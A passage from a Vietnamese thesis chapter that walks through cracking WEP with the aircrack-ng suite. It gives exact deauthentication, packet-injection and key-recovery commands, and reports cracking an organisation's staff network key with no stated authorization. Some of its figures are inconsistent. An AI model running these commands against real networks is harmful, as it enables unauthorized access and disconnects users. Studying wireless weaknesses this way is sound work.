Bƣớc 2: Sau khi thiết đặt các thông số chính về Access Point, ta chuyển sang cấu hình cho Wireless. Ở bước này ta thiết đặt SSID, Channel, Network Mode. Trong thí nghiệm này, như minh họa ở hình 4.4, tôi sử dụng kênh 11 (2.462GHz) và Network Mode là Mixed (thông thường các Access Point thường sử dụng kênh 6 và kênh 11 trong 13 kênh, Network Mode có thể cho chuẩn B, G hoặc Mixed)
Bƣớc 3: Thiết đặt bảo mật cho mạng không dây. Các mô hình bảo mật được chỉ ra như hình 4.5.
Hình 4.5: Các cơ chế bảo mật
Ở đây ta thiết đặt bảo mật WEP. Đối với bảo mật WEP, các AP cho phép sử dụng 4 khóa khác nhau trong một lần thiết đặt để kết nối mạng với mã 64 bits (10 ký tự) hoặc mã 128 bits (26 ký tự). Có thể sử dụng cách thức tự sinh khóa nếu nhập vào một từ thì hệ thống tự sinh ra 4 khóa thông qua chức năng Generate như minh họa ở hình 4.6.
Hình 4.6: Cấu hình bảo mật WEP 64 bits
Hoặc thiết đặt bảo mật WPA hoặc WPA2 với thuật toán sử dụng là TKIP hoặc EAS (hình 4.7).
Hình 4.7: Thiết đặt bảo mật WPA/WPA2
4.2.2. Cài đặt mạng cho thiết bị Clients
Ở đây tôi thiết lập với 2 máy, một máy kết nối bình thường với Access Point sử dụng key đã thiết lập ở trên. Một máy cài đặt các phần mềm để lấy khóa WEP
a. Cài đặt cho máy tính kết nối có key với Access Point:
Đối với máy tính này việc cài đặt cũng giống bất cứ máy nào kết nối vào mạng không dây. Việc đầu tiên là phải cài đặt card mạng. Sau đó lựa chọn mạng không dây, kết nối với key đã được cấp phát.
Hình 4.8: Kết nối máy tính với mạng không dây
b. Cài đặt cho máy dùng để lấy khóa WEP
Đối với máy này chúng ta cần phải thực hiện cài đặt card mạng để tương thích với chuẩn Commview, cài đặt phần mềm để thu thông tin của Access Point, cài đặt phần mềm để bắt các gói tin và cuối cùng là cài đặt phần mềm để lấy khóa WEP.
Cài đặt card mạng: Card mạng thường được cài đặt sẵn cùng máy tính, nhưng nếu muốn sử dụng card mạng để lấy khóa WEP thì phải cài lại card mạng sử dụng trình điều khiển Commview nhằm mục đích bơm thêm các gói tin vào mạng. Ở đây tôi sử dụng card mạng D-Link Air Plus 630G (có trong danh sách hỗ trợ của Commview). Gói cài đặt sẽ chứa thư viện commview.dll, cygwin1.dll, cygz.dll, omnipeek.dll. Thư viện Commview.dll sẽ tạo kết nối giữa ứng dụng Commview và card mạng.
Bước 1: Cập nhật lại trình điều khiển cho card mạng
Hình 4.9: Cập nhật lại driver cho card mạng
Bước 2: Chọn Driver từ thư mục Commview, ở đây tôi sử dụng driver net5211.inf. Các bước sau đó thực hiện như chỉ dẫn của trình cài đặt. Việc cài đặt này không được Microsoft hỗ trợ do driver này không tương thích với Microsoft. Khi cài đặt phần mềm Commview hoặc AWCrack sẽ có sẵn thư viện Driver của comview. Trong ví dụ này thư mục driver này là C:\AiroWizard\Atheros Driver 4.2.2.104 CommView Wifi.
Cài đặt Net Stumbler: Sau khi download bộ cài của chương trình Net Stumber từ website http://www.netstumber.com người sử dụng phải chạy thực thi tệp vừa download về, khi đó trình wizard sẽ hướng dẫn việc cài đặt Net Stumber. Thông thường các tham số của Net Stumber được thiết đặc mặc định khi cài đặt, nếu không cần thay đổi các tham số này ta có thể thực hiện theo các bước mặc định của trình cài đặt.
Hình 4.10: Lựa chọn trình điều khiển Commview
Cài đặt aircrack: Bộ cài aircrack trên Windows có thể được download tại http://www.aircrack-ng.org/doku.php, sau đó giải nén thì aircrack phải có các thành phần sau:
+ Airserv-ng: Sử dụng để cho phép sử dụng một card mạng cho nhiều ứng dụng khác nhau. Việc thực thi airserv-ng được thực hiện trên cửa sổ dòng lệnh.
+ Aireplay-ng: được sử dụng để ngắt kết nối của Client với Access Point, gửi tin xác thực sai, phát lại các gói tương tác, lặp lại việc gửi các gói ARP.
+ Aircrack-ng: được sử dụng để lấy khóa WEP + Airodump: sử dụng để bắt các gói tin chứa IVs.
4.3. Các bƣớc thực hiện
Bƣớc 1: Khởi động airserv-ng
Mục đích: airserv-ng là chương trình chính để quản lý các thiết bị giao tiếp không dây, chương trình này cho phép nhiều ứng dụng mạng không dây có thể chạy độc lập mà chỉ sử dụng một thiết bị giao tiếp không dây thông qua kết nối TCP client/server. Chương trình này hỗ trợ cho tất cả các hệ điều hành.
Cú pháp lệnh: Airserv-ng <opts>
Với <opts> là một trong các lựa chọn sau: -p <port>: là số hiệu cổng lắng nghe TCP -d <dev>: là thiết bị Wifi
-c <chan>: kênh truyền -v <level>: mức gỡ rối
Áp dụng: Trong ứng dụng này tôi sử dụng lệnh airserv-ng trên một cửa sổ dòng lệnh với thư viện commview.dll trên kênh 11 tại cổng 12345
C:\AIROWI~1\airserv-ng.exe -d "commview.dll|{0205EAA9-BD2D- 432D-919A-D73AE27AD755}" -p 12345 -c 11"
Hoặc ở chế độ debug:
Airserv-ng -d “commview.dll | debug” -p 12345 -c 11
Kết quả: Khi đó cửa sổ thực thi sẽ hiện ra như sau:
Hình 4.11: Cửa sổ khi chạy airserv-ng
Thông thường hệ thống sẽ hỏi lại xem có phải các thông tin đó đúng không (Does this look like your card? [y / n]). Nếu các thông tin nhập vào chính xác thì hệ thống sẽ thực hiện lắng nghe trên kênh 11 tại cổng 12345. Ở cửa sổ này sẽ thông báo trạng thái kết nối hoặc ngắt kết nối giữa các ứng dụng.
Hình 4.12: Trạng thái của airserv-ng
Bƣớc 2: Khởi động airodump-ng
Mục đích: Để lấy được khóa WEP chúng ta phải bắt được các khung tin 802.11 đặc biệt là các khung tin chứa IV. Chương trình này cho phép bắt các gói tin do AP gửi đến Client
Cú pháp:
Airodump-ng <options> <interface> [, <interface>,…..]
Với các lựa chọn <options> có thể là: --IVS: Chỉ bắt các gói IVs
--gpsd: Dùng cho trường hợp có kết nối GPS với máy tính --write <prefix>: Ghi thành tệp xuất dữ liệu
-w: như --write
--beacons: ghi lại tất cả các gói quảng bá
--update <secs>: hiển thị chế độ trễ của việc cập nhật theo giây --encrypt <suite>: lọc các điểm truy cập bằng các mã tương ứng --netmask <netmask>: lọc các điểm truy cập bởi các mặt nạ mạng --bssid <bssid>:Lọc các điểm truy cập bởi bssid
-a: Lọc các máy khách không kết nối
--channel <channels>: bắt các gói trên kênh được chỉ ra
Áp dụng: Trong thực nghiệm này tôi sử dụng airodump để lấy các gói IVS trên kênh 11 mà airserv-ng đang lắng nghe như sau:
C:\AIROWI~1\airodump-ng --channel 11 --encrypt WEP --write C:\AIROWI~1\dumps\luanvan.cap 127.0.0.1:12345
Kết quả: Giao diện khi thực hiện lệnh trên như sau:
Hình 4.13: Thực thi airodump-ng
Trong thí nghiệm này airodump-ng còn có thể bắt được các gói tin do Access Point (00:1E:E5:48:34:E7) trao đổi với một trạm (một máy tính khác cũng kết nối vào mạng này với địa chỉ mac 00:21:00:11:9F:AF). Trên bảng thực thi chúng ta có thể thấy các thông tin về số gói tin quảng bá, số gói tin dữ liệu, tốc độ truyền dữ liệu, tốc độ của Access Point, cách thức mã hóa của Access Point, tên của Access Point…
Khi airodump-ng chạy thì hệ thống tự động bắt tất cả các gói tin trao đổi giữa client và Access Point. Trong phần này, ta phải ghi lại các thông tin về access point như kênh phát là kênh bao nhiêu, địa chỉ mac của access point là gì, tên của access point …. Thông thường việc bắt các gói diễn ra chậm, ví dụ với mạng tuân theo chuẩn 802.11b thì trung bình 1s AP phát được 500 gói tin, như vậy nếu để bắt đủ các gói tin chứa Ivs (khoảng 17 triệu khung tin) ta phải mất thời gian khá lâu, do vậy ta phải sử dụng aireplay để bơm thêm các gói tin vào mạng để làm tăng lưu lượng mạng để nhanh chóng thu được số gói tin chứa IVs.
Bƣớc 3: Sử dụng Aireplay-ng.
Mục đích: bơm thêm các gói tin kết nối, xác thực, giả xác thực, phát lại, arp giữa Access Point và Client. Hoạt động của aireplay là gửi các gói tin deauthentication đến AP làm cho AP mất kết nối, “đá” client ra khỏi mạng, client sẽ phải gởi các yêu cầu ARP request để kết nối lại với AP. Khi đó tôi chạy aireplay với tham số khác cùng với địa chỉ MAC của client đã biết để giả dạng gửi các ARP request này liên tục tới AP, làm cho AP trả lời các yêu cầu này.
Cú pháp: aireplay-ng <options> <replay interface> Với các lựa chọn <options> như sau:
-b bssid: địa chỉ mac của Access point -d dmac: địa chỉ mac đích
-s smac: địa chỉ mac nguồn
-m len: chiều dài lớn nhất của gói tin -n len: chiều dài nhỏ nhất của gói tin
-u type: chỉ gói tin điều khiển thông qua trường type -v subt: chỉ gói tin điều khiển thông qua trường subtype -t tods: chỉ gói tin điều khiển thông qua trường To DS -f fromds: chỉ gói tin điều khiển thông qua trường From DS -w isWEP: chỉ gói tin điều khiển thông qua bít WEP
-x nbpps: số các gói trên một giây -p fctrl: đặt từ điều khiển gói tin
-a bssid: đặt địa chỉ Mac của Access Point -c dmac: đặt địa chỉ Mac của đích
-e essid: cách tấn công theo kiểu giả xác thực -j: cách tấn công theo kiểu phát lại gói arp -k IP: đặt địa chỉ IP đích trong phân đoạn -l IP: đặt địa chỉ nguồn trong phân đoạn --deauth count: gửi lại gói xác thực (-0)
--fakeauth delay: giả xác thực với Access Point (-1) --interactive: lựa chọn các khung tin tương tác (-2) --arpreplay: phát lại gói tin yêu cầu ARP (-3) --chopchop: gói WEP giải mã / gói nhanh (-4)
--fragment: sinh ra các giá trị hợp lý của khóa dòng (-5)
--test: kiểm tra việc bơm thêm các gói tin và chất lượng các gói (-9) --help: hiển thị màn hình trợ giúp
Áp dụng: Trong thực nghiệm này tôi sử dụng aireplay-ng để bơm thêm các gói tin tương tác (-2) giữa Access Point (-b) và Client (-h) trên cổng đã được mở của airserv-ng. Các thông tin về địa chỉ Mac của Access Point có thể được lấy từ chương trình Net Stumbler, trong thực nghiệm này tôi lấy được địa chỉ Mac của AP là 00:1e:e5:48:34:e7. Khi thực thi lệnh này hệ thống thường hỏi lại là có sử dụng các gói do chương trình sinh ra không (Use this packets? [y / n]). Ở đây để tăng nhanh lưu lượng mạng tôi sử dụng nhiều cửa sổ dòng lệnh để bơm thêm các gói tin. Các lệnh thực thi như sau:
+ Phát lại gói ARP chuẩn:
C:\AIROWI~1\aireplay-ng -3 -e trungph -b 00:1e:e5:48:34:e7 -h 00:13:46:E4:25:16 127.0.0.1:12345
Khi đó kết quả thực hiện sẽ như sau:
Hình 4.14: phát lại gói ARP
+ Bơm thêm các gói tương tác để tăng lưu lượng gửi/nhận các gói tin
C:\AIROWI~1\aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:1e:e5:48:34:e7 -h 00:13:46:E4:25:16 127.0.0.1:12345
+ Bơm thêm các gói giả xác thực để AP kiểm tra và gửi các gói tin phản hồi về máy khách
C:\AIROWI~1\aireplay-ng -1 0 -e trungph -a 00:1e:e5:48:34:e7 -d 00:13:46:E4:25:16 127.0.0.1:12345
Kết quả:
Hình 4.15: kết nối
+ Ngắt kết nối: gói tin ngắt kết nối này nhằm mục đích để AP ngắt kết nối với máy khách và buộc máy khách phải gửi lại gói tin ARP yêu cầu
C:\AIROWI~1\aireplay-ng -0 0 -a 00:1e:e5:48:34:e7 127.0.0.1:12345
Kết quả:
Hình 4.16: ngắt kết nối
+ Phân đoạn: việc thực hiện này nhằm mục đích bắt lấy một số gói dữ liệu từ phía AP gửi về sau đó phân tích thông tin trong các gói này để lấy về khóa luồng, nếu phát hiện ra có gói ARP thì hệ thống sẽ lưu lại khóa luồng để phục vụ cho công việc lấy khóa WEP
C:\AIROWI~1\aireplay-ng -5 -b 00:1e:e5:48:34:e7 -h 00:13:46:E4:25:16 127.0.0.1:12345
Hình 4.17: gửi các gói phân đoạn
+ Gửi các gói nhanh (chopchop). Trong trường hợp này aireplay đoán được phần dữ liệu bị thiếu khi AP loại bỏ những gói tin có kích thước nhỏ hơn 60 byte và từ đó lọc ra được các dữ liệu gốc trong các gói tin.
C:\AIROWI~1\aireplay-ng -4 -b 00:1e:e5:48:34:e7 -h 00:13:46:E4:25:16 127.0.0.1:12345
Kết quả thực thi:
Hình 4.18: gửi các gói nhanh
Bƣớc 4: Thực hiện lấy khóa WEP.
Mục đích: Sau khi chạy airdump-ng để bắt gói tin và aireplay-ng để bơm thêm các gói tin vào mạng thì tùy thuộc lưu lượng mạng sử dụng có lớn hay không thì ta có thể thực hiện việc lấy các gói tin. Với mô hình thử nghiệm tôi thực hiện trong vòng 4 phút với một máy vào mạng Internet liên tục và máy thực hiện việc thu thập các gói trong khoảng thời gian trên. Với khoảng thời gian trên ta có thể thu được khoảng 32000 IVs. Khi đó ta có thể sử dụng aircrack-ng để thực hiện việc lấy khóa.
Với các lựa chọn options như sau:
-a <amode>: mô hình tấn công (1 là WEP, 2 là wpa-psk)
-e <essid>: lựa chọn mạng đích trong trường hợp thu được nhiều gói từ các mạng khác nhau
-b <bssid>: địa chỉ của Access Point trong trường hợp có nhiều Access Point
-p <nbcpu>: id của CPU sử dụng, được sử dụng trong hệ thống đa tiến trình đối xứng (SMP system)
-q: bật chế độ yên lặng
-C <macs>: trộn nhiều Access Point vào thành một Access Point ảo -c: chỉ tìm kiếm các ký tự hoặc chữ số
-t: tìm kiếm các mã nhị phân -h: tìm kiếm các khóa số -d <mask>: chế độ gỡ rối
-m <maddr>: địa chỉ Mac để lọc các gói
-n <nbits>: độ dài của khóa WEP (64/128/152/256/512) -K: Cách tấn công KoreK (pre-PTW)
-M <num>: số các IVs lớn nhất được sử dụng --help: hiển thị trợ giúp
Áp dụng: Trong 2 thực nghiệm này với mạng ban đầu do tôi thiết lập trong thí nghiệm 1 thì sau khoảng 4 phút tôi bắt được khoảng 30000 IVs. Khi đó chương trình aircrack chỉ cần khoảng 20 giây là có thể dò ra khóa WEP. Còn trong thí nghiệm 2 tôi chỉ cần sử dụng 9 phút là lấy đủ IVs để dò ra khóa và mất 5 giây để dò ra khóa WEP.
Lệnh thực thi như sau:
C:\AIROWI~1\aircrack-ng.exe "C:\AIROWI~1\dumps\LUANVA~1.CAP Và
C:\AIROWI~1\aircrack-ng.exe "C:\AIROWI~1\dumps\staff~1.CAP
Hình 4.19: Quá trình dò khóa
Kết quả của thí nghiệm 1 như sau:
Hình 4.20: Kết quả của thí nghiệm 1
Kết quả của thí nghiệm 2 lấy được khóa WEP của mạng nhân viên Hanoi Aptech:
Hình 4.21: Kết quả của thí nghiệm 2
Như vậy quá trình thực hiện crack được thực hiện sau 4 bước với khoảng thời gian trung bình là 7 phút là có thể lấy được khóa WEP.
Hình 4.22: Báo lỗi không tìm được khóa
Bƣớc 5: Đăng nhập vào mạng với khóa vừa lấy được. Việc này được thực hiện như cấu hình nhận mạng không dây cho máy Client với khóa đầy đủ đã trình bày ở phần trên. Khi đó với một máy tính laptop, người sử dụng có thể bật phần “View Wireless Network Connections”, sau đó chọn trạm không dây (đã xác định ở các bước trước) và chọn “Connect”, khi đó hệ thống sẽ yêu cầu nhập vào khóa, chúng ta nhập vào khóa vừa lấy ở trên và chọn kết nối. Khi đó kết nối của laptop đó sẽ cho phép truy cập vào mạng của AP đó.
4.4. Các vấn đề khó khăn
Khó khăn thứ nhất là tìm được thiết bị phù hợp với chuẩn commview đặc biệt là card mạng. Phần chi tiết các card mạng được hỗ trợ bởi Commview được nêu trong phần phụ lục.
Khó khăn thứ hai là số gói tin IVs cần bắt tùy thuộc vào độ dài của khóa WEP. Thông thường với khóa WEP 40 bit (64 bit khóa), chúng ta có thể bẻ khóa với 300000Ivs và với khóa WEP 104 bit (128 bit khóa), chúng ta có thể bẻ khóa với 1500000Ivs; tuy nhiên nhiều khi số gói tin cần bắt phải lớn hơn 2 nghìn gói hoặc hơn. Hơn nữa không